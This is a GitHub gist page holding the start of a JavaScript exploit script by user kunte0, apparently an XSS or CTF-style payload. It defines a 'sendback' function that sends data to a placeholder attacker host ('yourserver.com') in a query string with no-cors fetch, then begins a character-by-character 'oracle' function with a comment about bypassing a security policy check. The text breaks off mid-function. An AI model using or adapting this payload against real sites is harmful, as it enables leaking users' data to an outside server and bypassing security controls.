Skip to content

Instantly share code, notes, and snippets.

View kunte0's full-sized avatar
πŸ’­
πŸ™ƒ

kunte_ kunte0

πŸ’­
πŸ™ƒ
View GitHub Profile
<script>
payload = () => {
const sendback = (msg) => {
fetch(`https://yourserver.com/aaaaaaaa?xxxx=${msg}`, {mode: 'no-cors'})
}
async function oracle(pos, charCode, retries=3) {
try {
// bypass the SecurityPolicy check. It is checked after a potential error